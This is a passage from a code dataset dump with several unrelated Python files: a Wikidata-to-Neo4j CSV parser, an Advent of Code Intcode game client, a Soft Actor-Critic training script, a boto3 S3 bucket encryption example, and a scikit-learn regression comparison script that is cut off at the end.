in lang_labels:\n if l in entity_labels:\n csv_entities.write(',\"' + fix_string(entity_labels[l]) + '\"')\n else:\n csv_entities.write(',')\n \n for d in lang_descriptions:\n if d in entity_descriptions:\n csv_entities.write(',\"' + fix_string(entity_descriptions[d]) + '\"')\n else:\n csv_entities.write(',')\n\n for alias in lang_aliases:\n if alias in entity_aliases:\n a_array = entity_aliases[alias]\n csv_entities.write(',')\n first = True\n for a in a_array:\n if first:\n csv_entities.write( fix_string(a) )\n first = False\n else:\n csv_entities.write(';' + fix_string(a) )\n else:\n csv_entities.write(',')\n csv_entities.write('\\n')\n\n if 'claims' in j:\n claims = j['claims']\n for c in claims:\n relationship = c\n p = j['claims'][c]\n for p2 in p:\n claim_generated_id += 1\n claim = 'CL' + str(claim_generated_id)\n if 'qualifiers' in p2:\n qualifiers = p2['qualifiers']\n for c in qualifiers:\n q = qualifiers[c]\n for q2 in q:\n qualifier_generated_id += 1\n csv_qualifiers.write('C'+str(qualifier_generated_id)+'\\n')\n csv_relationships.write(claim + ',C' + str(qualifier_generated_id) + ',QUAL_FROM\\n')\n csv_relationships.write('C' + str(qualifier_generated_id) + ',' + c + ',PROPERTY\\n')\n\n datatype = q2['datatype']\n\n if datatype == 'wikibase-item':\n if 'datavalue' not in q2:\n continue\n item = q2['datavalue']['value']['numeric-id']\n item = \"Q\" + str(item)\n csv_relationships.write('C'+str(qualifier_generated_id) + ',' + item + \",QUAL_TO\\n\")\n\n elif datatype == 'time':\n if 'datavalue' not in q2:\n continue\n time = q2['datavalue']['value']['time']\n timezone = str(q2['datavalue']['value']['timezone'])\n before = str(q2['datavalue']['value']['before'])\n after = str(q2['datavalue']['value']['after'])\n precision = str(q2['datavalue']['value']['precision'])\n year, month, day = parse_time(time, int(precision))\n csv_time.write('T'+str(time_generated_id) +','+time+','+timezone+','+before+','+after+','+precision+','+year+','+month+','+day+'\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + ',T' + str(time_generated_id) + \",QUAL_TO\\n\")\n time_generated_id += 1\n\n elif datatype == 'string':\n if 'datavalue' not in q2:\n continue\n string_value = q2['datavalue']['value']\n csv_strings.write('S'+str(string_generated_id) + ','+ fix_string(string_value) + '\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + ',S' + str(string_generated_id) + \",QUAL_TO\\n\")\n string_generated_id += 1\n\n elif datatype == 'quantity':\n if 'datavalue' not in q2:\n continue\n amount = q2['datavalue']['value']['amount']\n unit = q2['datavalue']['value']['unit']\n upperBound = q2['datavalue']['value']['upperBound']\n lowerBound = q2['datavalue']['value']['lowerBound']\n csv_quantity.write('QT'+str(quantity_generated_id)+','+amount+','+unit+','+upperBound+','+lowerBound+'\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",QT\" + str(quantity_generated_id) + ',QUAL_TO\\n')\n quantity_generated_id += 1\n\n elif datatype == 'url':\n if 'datavalue' not in q2:\n continue\n url_value = fix_string(q2['datavalue']['value'])\n csv_url.write('U' + str(url_generated_id) + ',' + url_value + '\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",U\" + str(url_generated_id) + ',QUAL_TO\\n')\n url_generated_id += 1\n\n elif datatype == 'monolingualtext':\n if 'datavalue' not in q2:\n continue\n mono_text = fix_string(q2['datavalue']['value']['text'])\n mono_lang = q2['datavalue']['value']['language']\n csv_monolingual.write('MT'+ str(mono_generated_id) + ',' + mono_text + ',' + mono_lang + '\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",MT\" + str(mono_generated_id) + ',QUAL_TO\\n')\n mono_generated_id += 1\n\n elif datatype == 'commonsMedia':\n if 'datavalue' not in q2:\n continue\n commons_value = fix_string(q2['datavalue']['value'])\n csv_commons.write('CM' + str(commons_generated_id) + ',' + commons_value + '\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",CM\" + str(commons_generated_id) + ',QUAL_TO\\n')\n commons_generated_id += 1\n\n elif datatype == 'globe-coordinate':\n if 'datavalue' not in q2:\n continue\n latitude = xstr(q2['datavalue']['value']['latitude'])\n longitude = xstr(q2['datavalue']['value']['longitude'])\n altitude = xstr(q2['datavalue']['value']['altitude'])\n precision = xstr(q2['datavalue']['value']['precision'])\n globe = xstr(q2['datavalue']['value']['globe'])\n globe_value = 'lat:' + latitude + ' lon:' + longitude\n csv_globe.write('GC'+str(globe_generated_id)+','+globe_value+','+latitude+','+longitude+','+altitude+','+precision+','+globe+'\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",GC\" + str(globe_generated_id) + ',QUAL_TO\\n')\n globe_generated_id += 1\n\n if 'references' in p2:\n references_list = p2['references']\n for reference in references_list:\n snaks = reference['snaks']\n for prop_snak in snaks:\n prop_snak_list = snaks[prop_snak]\n for snak in prop_snak_list:\n reference_generated_id += 1\n csv_references.write('R'+str(reference_generated_id)+'\\n')\n csv_relationships.write(claim + ',R' + str(reference_generated_id) + ',REF_FROM\\n')\n csv_relationships.write('R' + str(reference_generated_id) + ',' + prop_snak + ',PROPERTY\\n')\n datatype = snak['datatype']\n \n if datatype == 'wikibase-item':\n if 'datavalue' not in snak:\n continue\n item = \"R\" + str(snak['datavalue']['value']['numeric-id'])\n csv_relationships.write('R'+str(reference_generated_id) + ',' + item + \",REF_TO\\n\")\n\n elif datatype == 'string':\n if 'datavalue' not in snak:\n continue\n string_value = snak['datavalue']['value']\n csv_strings.write('S'+str(string_generated_id) + ','+ fix_string(string_value) + '\\n')\n csv_relationships.write('R'+str(reference_generated_id) + ',S' + str(string_generated_id) + \",REF_TO\\n\")\n string_generated_id += 1\n\n elif datatype == 'time':\n if 'datavalue' not in snak:\n continue\n time = snak['datavalue']['value']['time']\n timezone = str(snak['datavalue']['value']['timezone'])\n before = str(snak['datavalue']['value']['before'])\n after = str(snak['datavalue']['value']['after'])\n precision = str(snak['datavalue']['value']['precision'])\n year, month, day = parse_time(time, int(precision))\n csv_time.write('T'+str(time_generated_id) +','+time+','+timezone+','+before+','+after+','+precision+','+year+','+month+','+day+'\\n')\n csv_relationships.write('R'+str(reference_generated_id) + ',T' + str(time_generated_id) + \",REF_TO\\n\")\n time_generated_id += 1\n\n elif datatype == 'quantity':\n if 'datavalue' not in snak:\n continue\n amount = snak['datavalue']['value']['amount']\n unit = snak['datavalue']['value']['unit']\n upperBound = snak['datavalue']['value']['upperBound']\n lowerBound = snak['datavalue']['value']['lowerBound']\n csv_quantity.write('QT'+str(quantity_generated_id)+','+amount+','+unit+','+upperBound+','+lowerBound+'\\n')\n csv_relationships.write('R'+str(reference_generated_id) + \",QT\" + str(quantity_generated_id) + ',REF_TO\\n')\n quantity_generated_id += 1\n\n elif datatype == 'url':\n if 'datavalue' not in snak:\n continue\n url_value = fix_string(snak['datavalue']['value'])\n csv_url.write('U' + str(url_generated_id) + ',' + url_value + '\\n')\n csv_relationships.write('R'+str(reference_generated_id) + \",U\" + str(url_generated_id) + ',REF_TO\\n')\n url_generated_id += 1\n\n elif datatype == 'monolingualtext':\n if 'datavalue' not in snak:\n continue\n mono_text = fix_string(snak['datavalue']['value']['text'])\n mono_lang = snak['datavalue']['value']['language']\n csv_monolingual.write('MT'+ str(mono_generated_id) + ',' + mono_text + ',' + mono_lang + '\\n')\n csv_relationships.write('R'+str(qualifier_generated_id) + \",MT\" + str(mono_generated_id) + ',REF_TO\\n')\n mono_generated_id += 1\n\n elif datatype == 'commonsMedia':\n if 'datavalue' not in snak:\n continue\n commons_value = fix_string(snak['datavalue']['value'])\n csv_commons.write('CM' + str(commons_generated_id) + ',' + commons_value + '\\n')\n csv_relationships.write('R'+str(reference_generated_id) + \",CM\" + str(commons_generated_id) + ',REF_TO\\n')\n commons_generated_id += 1\n\n elif datatype == 'globe-coordinate':\n if 'datavalue' not in snak:\n continue\n latitude = xstr(snak['datavalue']['value']['latitude'])\n longitude = xstr(snak['datavalue']['value']['longitude'])\n altitude = xstr(snak['datavalue']['value']['altitude'])\n precision = xstr(snak['datavalue']['value']['precision'])\n globe = xstr(snak['datavalue']['value']['globe'])\n globe_value = 'lat:' + latitude + ' lon:' + longitude\n csv_globe.write('GC'+str(globe_generated_id)+','+globe_value+','+latitude+','+longitude+','+altitude+','+precision+','+globe+'\\n')\n csv_relationships.write('C'+str(qualifier_generated_id) + \",GC\" + str(globe_generated_id) + ',REF_TO\\n')\n globe_generated_id += 1\n\n if 'datatype' in p2['mainsnak']:\n datatype = p2['mainsnak']['datatype']\n csv_claims.write(claim + '\\n')\n csv_relationships.write(claim + \",\" + relationship + ',PROPERTY\\n')\n csv_relationships.write(entity_id + \",\" + claim + \",PROP_FROM\\n\")\n \n if datatype == 'wikibase-item':\n if 'datavalue' not in p2['mainsnak']:\n continue\n item = p2['mainsnak']['datavalue']['value']['numeric-id']\n item = \"Q\" + str(item)\n csv_relationships.write(claim + \",\" + item + \",PROP_TO\\n\")\n\n elif datatype == 'wikibase-property':\n if 'datavalue' not in p2['mainsnak']:\n continue\n prop = p2['mainsnak']['datavalue']['value']['numeric-id']\n prop = \"P\" + str(prop)\n csv_relationships.write(claim + \",\" + prop + \",PROP_TO\\n\")\n \n elif datatype == 'string':\n if 'datavalue' not in p2['mainsnak']:\n continue\n string_id = p2['id']\n string_value = p2['mainsnak']['datavalue']['value']\n csv_strings.write(string_id + ','+ fix_string(string_value) + '\\n')\n csv_relationships.write(claim + \",\" + string_id + ',PROP_TO\\n')\n\n elif datatype == 'time':\n if 'datavalue' not in p2['mainsnak']:\n continue\n time_id = p2['id']\n time = p2['mainsnak']['datavalue']['value']['time']\n timezone = str(p2['mainsnak']['datavalue']['value']['timezone'])\n before = str(p2['mainsnak']['datavalue']['value']['before'])\n after = str(p2['mainsnak']['datavalue']['value']['after'])\n precision = str(p2['mainsnak']['datavalue']['value']['precision'])\n year, month, day = parse_time(time, int(precision))\n csv_time.write(time_id +','+time+','+timezone+','+before+','+after+','+precision+','+year+','+month+','+day+'\\n')\n csv_relationships.write(claim + \",\" + time_id + ',PROP_TO\\n')\n\n elif datatype == 'quantity':\n if 'datavalue' not in p2['mainsnak']:\n continue\n quantity_id = p2['id']\n amount = p2['mainsnak']['datavalue']['value']['amount']\n unit = p2['mainsnak']['datavalue']['value']['unit']\n upperBound = p2['mainsnak']['datavalue']['value']['upperBound']\n lowerBound = p2['mainsnak']['datavalue']['value']['lowerBound']\n csv_quantity.write(quantity_id + ','+ amount + ',' + unit + ',' + upperBound + ',' + lowerBound + '\\n')\n csv_relationships.write(claim + \",\" + quantity_id + ',PROP_TO\\n')\n \n elif datatype == 'url':\n if 'datavalue' not in p2['mainsnak']:\n continue\n url_value = fix_string(p2['mainsnak']['datavalue']['value'])\n csv_url.write('U' + str(url_generated_id) + ',' + url_value + '\\n')\n csv_relationships.write(claim + \",U\" + str(url_generated_id) + ',PROP_TO\\n')\n url_generated_id += 1\n\n elif datatype == 'monolingualtext':\n if 'datavalue' not in p2['mainsnak']:\n continue\n mono_text = fix_string(p2['mainsnak']['datavalue']['value']['text'])\n mono_lang = p2['mainsnak']['datavalue']['value']['language']\n csv_monolingual.write('MT'+ str(mono_generated_id) + ',' + mono_text + ',' + mono_lang + '\\n')\n csv_relationships.write(claim + \",MT\" + str(mono_generated_id) + ',PROP_TO\\n')\n mono_generated_id += 1\n\n elif datatype == 'commonsMedia':\n if 'datavalue' not in p2['mainsnak']:\n continue\n commons_value = fix_string(p2['mainsnak']['datavalue']['value'])\n csv_commons.write('CM' + str(commons_generated_id) + ',' + commons_value + '\\n')\n csv_relationships.write(claim + \",CM\" + str(commons_generated_id) + ',PROP_TO\\n')\n commons_generated_id += 1\n \n elif datatype == 'globe-coordinate':\n if 'datavalue' not in p2['mainsnak']:\n continue\n latitude = xstr(p2['mainsnak']['datavalue']['value']['latitude'])\n longitude = xstr(p2['mainsnak']['datavalue']['value']['longitude'])\n altitude = xstr(p2['mainsnak']['datavalue']['value']['altitude'])\n precision = xstr(p2['mainsnak']['datavalue']['value']['precision'])\n globe = xstr(p2['mainsnak']['datavalue']['value']['globe'])\n globe_value = 'lat:' + latitude + ' lon:' + longitude\n csv_globe.write('GC'+str(globe_generated_id)+','+globe_value+','+latitude+','+longitude+','+altitude+','+precision+','+globe+'\\n')\n csv_relationships.write(claim + \",GC\" + str(globe_generated_id) + ',PROP_TO\\n')\n globe_generated_id += 1\n\n\n# close all open files\ncsv_url.close()\ncsv_time.close()\ncsv_globe.close()\njson_file.close()\ncsv_claims.close()\ncsv_commons.close() \ncsv_strings.close()\ncsv_quantity.close()\ncsv_entities.close()\ncsv_qualifiers.close()\ncsv_references.close()\ncsv_monolingual.close()\ncsv_relationships.close()\n","sub_path":"engine-neo4j/generate_csv/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":26279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"134387141","text":"#!/usr/bin/env python3\nfrom sys import argv\nfrom collections import defaultdict\nfrom Intcode import Intcode\n\n# read in the program\nfilename = argv[1]\nwith open(filename) as f:\n pgm = defaultdict(int, {i:int(x) for i,x in enumerate(f.readline().rstrip().split(\",\"))})\n\nvc = Intcode(pgm, 0)\ns = ''\nwhile True:\n result = vc.run()\n s += chr(result)\n if s.endswith('Command?\\n') or len(s) > 1000 or vc.halted:\n cmd = input(s)\n cmd += '\\n'\n s = ''\n vc.input = [ord(c) for c in cmd]\n vc.input_ptr = 0\n\n# Items needed in inventory to get past checkpoint:\n# Items in your inventory:\n# - hologram\n# - space law space brochure\n# - mutex\n# - manifold\n","sub_path":"day25/cryostatis.py","file_name":"cryostatis.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"73573744","text":"\"\"\"\nPyTorch code for SAC. Copied and modified from PyTorch code for SAC-NF (Mazoure et al., 2019): https://arxiv.org/abs/1905.06893\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nimport time\nimport datetime\nimport itertools\nimport random\nimport pickle\nimport glob\n\nimport gym\nimport numpy as np\nimport torch\nfrom sac_gs import SAC\nfrom normalized_actions import NormalizedActions\nfrom replay_memory import ReplayMemory\nimport pandas as pd\ntry:\n import pybulletgym\nexcept:\n print('No PyBullet Gym. Skipping...')\nfrom utils import logging, get_time, print_args\nfrom utils import save_checkpoint, load_checkpoint\n\nfrom tensorboardX import SummaryWriter\n\n\nparser = argparse.ArgumentParser(description='PyTorch code for SAC-NF (Mazoure et al., 2019,https://arxiv.org/abs/1905.06893)')\nparser.add_argument('--env-name', default=\"Ant-v2\",\n help='name of the environment to run')\nparser.add_argument('--eval', type=bool, default=True,\n help='Evaluates a policy a policy every 10 episode (default:True)')\nparser.add_argument('--gamma', type=float, default=0.99, metavar='G',\n help='discount factor for reward (default: 0.99)')\nparser.add_argument('--tau', type=float, default=0.005, metavar='G',\n help='target smoothing coefficient(tau) (default: 0.005)')\nparser.add_argument('--lr', type=float, default=0.0003, metavar='G',\n help='learning rate (default: 0.0003)')\nparser.add_argument('--num_layers', type=int, default=1,\n help='number of layers (default: 1)')\nparser.add_argument('--actor_lr', type=float, default=0.0003, metavar='G',\n help='learning rate (default: 0.0003)')\nparser.add_argument('--alpha', type=float, default=0.05, metavar='G',\n help='Temperature parameter alpha determines the relative importance of the entropy term against the reward (default: 0.2)')\nparser.add_argument('--automatic_entropy_tuning', type=bool, default=False, metavar='G',\n help='Temperature parameter alpha automaically adjusted.')\n#parser.add_argument('--seed', type=int, default=456, metavar='N',\n# help='random seed (default: 456)')\nparser.add_argument('--batch_size', type=int, default=256, metavar='N',\n help='batch size (default: 256)')\nparser.add_argument('--num_steps', type=int, default=3000001, metavar='N',\n help='maximum number of steps (default: 1000000)')\nparser.add_argument('--hidden_size', type=int, default=256, metavar='N',\n help='hidden size (default: 256)')\nparser.add_argument('--updates_per_step', type=int, default=1, metavar='N',\n help='model updates per simulator step (default: 1)')\nparser.add_argument('--start_steps', type=int, default=10000, metavar='N',\n help='Steps sampling random actions (default: 10000)')\nparser.add_argument('--target_update_interval', type=int, default=1, metavar='N',\n help='Value target update per no. of updates per step (default: 1)')\nparser.add_argument('--hadamard',type=int,default=1)\nparser.add_argument('--replay_size', type=int, default=1000000, metavar='N',\n help='size of replay buffer (default: 10000000)')\nparser.add_argument('--cuda', action=\"store_true\",\n help='run on CUDA (default: False)')\nparser.add_argument('--cache', default='experiments', type=str)\nparser.add_argument('--experiment', default=None, help='name of experiment')\nparser.add_argument('--nb_evals', type=int, default=10,\n help='nb of evaluations')\nparser.add_argument('--resume', dest='resume', action='store_true', default=True,\n help='flag to resume the experiments')\nparser.add_argument('--no-resume', dest='resume', action='store_false', default=True,\n help='flag to resume the experiments')\nparser.add_argument('--exp-num', type=int, default=0,\n help='experiment number')\n\n# seed\nparser.add_argument('--seed', type=int, default=456, metavar='N',\n help='random seed (default: 456)')\n\n# log\nparser.add_argument('--log-interval', type=int, default=1000,\n help='log print-out interval (step)')\nparser.add_argument('--eval-interval', type=int, default=10000,\n help='eval interval (step)')\nparser.add_argument('--ckpt-interval', type=int, default=5000,\n help='checkpoint interval (step)')\n\nargs = parser.parse_args()\nargs.hadamard = bool(args.hadamard)\n\n# set env\nif args.env_name == 'Humanoidrllab':\n from rllab.envs.mujoco.humanoid_env import HumanoidEnv\n from rllab.envs.normalized_env import normalize\n env = normalize(HumanoidEnv())\n max_episode_steps = float('inf')\n if args.seed >= 0:\n global seed_\n seed_ = args.seed\nelse:\n env = gym.make(args.env_name)\n max_episode_steps=env._max_episode_steps\n env=NormalizedActions(env)\n if args.seed >= 0:\n env.seed(args.seed)\nif args.seed >= 0:\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n torch.random.manual_seed(args.seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n# set args\nargs.num_actions = env.action_space.shape[0]\nargs.max_action = env.action_space.high\nargs.min_action = env.action_space.low\n\n# set cache folder\nif args.cache is None:\n args.cache = 'experiments'\nif args.experiment is None:\n args.experiment = '-'.join(['sac',\n 'mnh{}'.format(args.num_layers),\n 'sstep{}'.format(args.start_steps),\n 'a{}'.format(args.alpha),\n 'mlr{}'.format(args.lr),\n 'seed{}'.format(args.seed),\n 'exp{}'.format(args.exp_num),\n ])\nargs.path = os.path.join(args.cache, args.experiment)\nif args.resume:\n listing = glob.glob(args.path+'-19*') + glob.glob(args.path+'-20*')\n if len(listing) == 0:\n args.path = '{}-{}'.format(args.path, get_time())\n else:\n path_sorted = sorted(listing, key=lambda x: datetime.datetime.strptime(x, args.path+'-%y%m%d-%H:%M:%S'))\n args.path = path_sorted[-1]\n pass\nelse:\n args.path = '{}-{}'.format(args.path, get_time())\nos.system('mkdir -p {}'.format(args.path))\n\n# print args\nlogging(str(args), path=args.path)\n\n# init tensorboard\nwriter = SummaryWriter(args.path)\n\n# print config\nconfiguration_setup='SAC'\nconfiguration_setup+='\\n'\nconfiguration_setup+=print_args(args)\n#for arg in vars(args):\n# configuration_setup+=' {} : {}'.format(str(arg),str(getattr(args, arg)))\n# configuration_setup+='\\n'\nlogging(configuration_setup, path=args.path)\n\n# init sac\nagent = SAC(env.observation_space.shape[0], env.action_space, args)\nlogging(\"----------------------------------------\", path=args.path)\nlogging(str(agent.critic), path=args.path)\nlogging(\"----------------------------------------\", path=args.path)\nlogging(str(agent.policy), path=args.path)\nlogging(\"----------------------------------------\", path=args.path)\n\n# memory\nmemory = ReplayMemory(args.replay_size)\n\n# resume\nargs.start_episode = 1\nargs.offset_time = 0 # elapsed\nargs.total_numsteps = 0\nargs.updates = 0\nargs.eval_steps = 0\nargs.ckpt_steps = 0\nagent.load_model(args)\nmemory.load(os.path.join(args.path, 'replay_memory'), 'pkl')\n\n# Training Loop\ntotal_numsteps = args.total_numsteps # 0\nupdates = args.updates # 0\neval_steps = args.eval_steps # 0\nckpt_steps = args.ckpt_steps # 0\nstart_episode = args.start_episode # 1\noffset_time = args.offset_time # 0\nstart_time = time.time()\nif 'dataframe' in args:\n df = args.dataframe\nelse:\n df = pd.DataFrame(columns=[\"total_steps\", \"score_eval\", \"time_so_far\"])\n\nfor i_episode in itertools.count(start_episode):\n episode_reward = 0\n episode_steps = 0\n done = False\n state = env.reset()\n\n while not done:\n if args.start_steps > total_numsteps:\n action = np.random.uniform(env.action_space.low,env.action_space.high,env.action_space.shape[0]) # Sample random action\n else:\n action = agent.select_action(state) # Sample action from policy\n if len(memory) > args.start_steps:\n # Number of updates per step in environment\n for i in range(args.updates_per_step):\n # Update parameters of all the networks\n (critic_1_loss, critic_2_loss,\n policy_loss,\n _, _,\n policy_info,\n )= agent.update_parameters(memory, args.batch_size, updates)\n updates += 1\n\n # log\n if updates % args.log_interval == 0:\n logging(\"Episode: {}\"\n \", update: {}\"\n \", critic_1 loss: {:.3f}\"\n \", critic_2 loss: {:.3f}\"\n .format(\n i_episode,\n updates,\n critic_1_loss,\n critic_2_loss,\n ), path=args.path)\n\n writer.add_scalar('train/critic_1/loss/update', critic_1_loss, updates)\n writer.add_scalar('train/critic_2/loss/update', critic_2_loss, updates)\n else:\n pass\n\n next_state, reward, done, _ = env.step(action) # Step\n episode_steps += 1\n total_numsteps += 1\n eval_steps += 1\n ckpt_steps += 1\n episode_reward += reward\n\n # Ignore the \"done\" signal if it comes from hitting the time horizon.\n # (https://github.com/openai/spinningup/blob/master/spinup/algos/sac/sac.py)\n mask = 1 if episode_steps == max_episode_steps else float(not done)\n\n memory.push(state, action, reward, next_state, mask) # Append transition to memory\n\n state = next_state\n\n elapsed = round((time.time() - start_time + offset_time),2)\n logging(\"Episode: {}\"\n \", time (sec): {}\"\n \", total numsteps: {}\"\n \", episode steps: {}\"\n \", reward: {}\"\n .format(\n i_episode,\n elapsed,\n total_numsteps,\n episode_steps,\n round(episode_reward, 2),\n ), path=args.path)\n writer.add_scalar('train/ep_reward/episode', episode_reward, i_episode)\n writer.add_scalar('train/ep_reward/step', episode_reward, total_numsteps)\n\n # evaluation\n if eval_steps>=args.eval_interval or total_numsteps > args.num_steps:\n logging('evaluation time', path=args.path)\n r=[]\n for _ in range(args.nb_evals):\n state = env.reset()\n episode_reward = 0\n done = False\n while not done:\n action = agent.select_action(state, eval=True)\n\n next_state, reward, done, _ = env.step(action)\n episode_reward += reward\n\n state = next_state\n r.append(episode_reward)\n mean_reward=np.mean(r)\n\n # add to data frame\n res = {\"total_steps\": total_numsteps,\n \"score_eval\": mean_reward,\n \"time_so_far\": round((time.time() - start_time),2)}\n df = df.append(res, ignore_index=True)\n\n # add to log\n logging(\"----------------------------------------\", path=args.path)\n logging(\"Test Episode: {}, mean reward: {}, ep reward: {}\"\n .format(\n i_episode, round(mean_reward, 2), round(episode_reward, 2),\n ), path=args.path)\n logging(\"----------------------------------------\", path=args.path)\n writer.add_scalar('test/ep_reward/mean/step', mean_reward, total_numsteps)\n writer.add_scalar('test/ep_reward/episode/step', episode_reward, total_numsteps)\n\n # writer\n writer.flush()\n\n # reset count\n eval_steps%=args.eval_interval\n\n if ckpt_steps>=args.ckpt_interval and args.ckpt_interval > 0:\n training_info = {\n 'start_episode': i_episode+1,\n 'offset_time': round((time.time() - start_time + offset_time),2),\n 'total_numsteps': total_numsteps,\n 'updates': updates,\n 'eval_steps': eval_steps,\n 'ckpt_steps': ckpt_steps,\n 'dataframe': df,\n }\n agent.save_model(training_info)\n memory.save(os.path.join(args.path, 'replay_memory'), 'pkl')\n ckpt_steps%=args.ckpt_interval\n\n if total_numsteps > args.num_steps:\n break\n\nenv.close()\n","sub_path":"main_gs.py","file_name":"main_gs.py","file_ext":"py","file_size_in_byte":12770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"264501256","text":"import boto3\nimport pprint\nfrom botocore.exceptions import ClientError\n\n#\n# setting up configured profile on your machine.\n# You can ignore this step if you want use default AWS CLI profile.\n#\nboto3.setup_default_session(profile_name='admin-analyticshut')\n\ns3 = boto3.client('s3')\n# Setting up encryption to bucket. There are two possible algorithms 1. AES256 2. aws:kms\n# for details, check\n\n# Using AES256 for encryption\ntry:\n response = s3.put_bucket_encryption(\n Bucket='testbucket-frompython-1',\n ServerSideEncryptionConfiguration={\n 'Rules': [\n {\n 'ApplyServerSideEncryptionByDefault': {\n 'SSEAlgorithm': 'AES256'\n }\n }\n ]\n }\n )\n print(pprint.pprint(response))\nexcept ClientError as e:\n print(e)\n\n\n# using KMS\n# You will need to create KMS key before using KMS for encryption\n# please note that there is additional cost involved for using KMS\n\ntry:\n response = s3.put_bucket_encryption(\n Bucket='testbucket-frompython-1',\n ServerSideEncryptionConfiguration={\n 'Rules': [\n {\n 'ApplyServerSideEncryptionByDefault': {\n 'SSEAlgorithm': 'aws:kms',\n 'KMSMasterKeyID': 'key id for kms key to be used'\n }\n }\n ]\n }\n )\n print(pprint.pprint(response))\nexcept ClientError as e:\n print(e)\n\n","sub_path":"S3-Buckets/Python/set_bucket_encryption.py","file_name":"set_bucket_encryption.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"313010934","text":"import fileUtilities\nfrom sklearn import preprocessing\n#from sklearn.model_selection import train_test_split\nfrom sklearn import linear_model\nfrom sklearn import ensemble\nfrom sklearn import svm\nfrom sklearn import dummy\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom time import time\nimport random\nimport numpy as np\n\nrandom.seed(100)\nnp.random.seed(100)\n\n#TEST_PERCENT = .20\n\n\ndef getNewModel():\n alphas = [2**x for x in range(-7, 4)]\n #estimators = [1, 2, 4, 10, 20, 50, 100]\n yield dummy.DummyRegressor()\n yield linear_model.LinearRegression()\n yield linear_model.BayesianRidge()\n yield linear_model.RidgeCV(alphas=alphas)\n yield linear_model.ElasticNetCV(alphas=alphas)\n yield linear_model.LassoCV(alphas=alphas)\n yield ensemble.GradientBoostingRegressor(n_estimators=10)\n yield ensemble.AdaBoostRegressor(n_estimators=10)\n #yield ensemble.ExtraTreesRegressor(n_estimators=10)\n yield ensemble.RandomForestRegressor(n_estimators=10)\n #yield svm.LinearSVR()\n ''' can take 5+ mins below ...'''\n #yield svm.SVR(kernel='rbf')\n\n\ndef main():\n train_data, test_data, synthetic_data = fileUtilities.getDataFromCSV()\n trainX = train_data[:, :-1]\n trainY = train_data[:, -1]\n scaler = preprocessing.StandardScaler().fit(trainX)\n trainX = scaler.transform(trainX)\n\n testX = test_data[:, :-1]\n testY = test_data[:, -1]\n testX = scaler.transform(testX)\n #trainX, testX, trainY, testY = train_test_split(x, y, test_size=TEST_PERCENT)\n numFeatures = trainX.shape[1]\n trainSize = trainX.shape[0]\n testSize = testX.shape[0]\n assert trainSize > 50\n assert testSize > 0\n assert numFeatures > 0\n print(\"\\t Features:{} \\t TrainSize={} \\t TestSize={}\".format(numFeatures, trainSize, testSize))\n\n model_list = []\n\n with open(\"ModelResults.csv\", 'w') as outFile:\n headers = \"Full Name,Alpha,Estimators,Duration,TrainSize,TrainMSE,TrainRMSE,TestSize,TestMSE,TestRMSE,R^2 Score\\n\"\n outFile.write(headers)\n\n for model in getNewModel():\n model.name = str(model).split('(')[0]\n trainModel(model, trainX, trainY)\n model_list.append(model)\n print(\"\\n\")\n for model in model_list:\n testModel(model, testX, testY)\n printModelResults(model)\n outFile.write(getOutputModelString(model) + '\\n')\n print(\"\\n\")\n for model in model_list:\n \tmakeIndividualPredictions(model, synthetic_data, scaler)\n\n\ndef trainModel(model, trainData, trainLabels):\n print(\"Training with\", model.name, \"...\")\n model.trainSize = trainData.shape[0]\n start = time()\n model.fit(trainData, trainLabels)\n model.trainDuration = time() - start\n trainPredictions = model.predict(trainData)\n model.trainMSE = mean_squared_error(trainLabels, trainPredictions)\n model.trainRMSE = np.sqrt(model.trainMSE)\n\n\ndef testModel(model, testData, testLabels):\n print(\"Testing with\", model.name, \"...\")\n model.testSize = testData.shape[0]\n testPredictions = model.predict(testData)\n model.testMSE = mean_squared_error(testLabels, testPredictions)\n model.score = r2_score(testLabels, testPredictions)\n model.testRMSE = np.sqrt(model.testMSE)\n\n\ndef printModelResults(model):\n name = model.name\n estimators = model.get_params().get('n_estimators', 0)\n if estimators > 0:\n name += \", est=\" + str(estimators)\n dur = \"{0:.3f}\".format(model.trainDuration)\n trainMSE = \"{0:.3f}\".format(model.trainMSE)\n testMSE = \"{0:.3f}\".format(model.testMSE)\n score = \"{0:.3f}\".format(model.score)\n outputs = name, dur, trainMSE, testMSE, score\n print(\"\\t{} took {} secs with MSEs of {} and {} and R^2 of {}\".format(*outputs))\n\n\ndef getOutputModelString(m):\n # headers = \"Name,Alpha,Estimators,Duration,TrainSize,TrainMSE,TestSize,TestMSE,r^2\"\n # alphas = m.get_params().get('alphas', [])\n alpha = getattr(m, 'alpha_', '')\n estimator = m.get_params().get('n_estimators', '')\n #fullName = m.name + str(estimator)\n fullName = m.name\n output = [fullName]\n output.append(alpha)\n output.append(estimator)\n output.append(m.trainDuration)\n output.append(m.trainSize)\n output.append(m.trainMSE)\n output.append(m.trainRMSE)\n output.append(m.testSize)\n output.append(m.testMSE)\n output.append(m.testRMSE)\n output.append(m.score)\n return ','.join([str(val) for val in output])\n\n\ndef makeIndividualPredictions(model, s_data, scaler):\n\ttestPredictions = model.predict(scaler.transform(s_data))\n\tformattedPred = [\"{:0.3f}\".format(member) for member in testPredictions]\n\tprint(\"Testing synthetic data with\", model.name, \"gives the predictions\", formattedPred)\n\n\nif __name__ == '__main__':\n 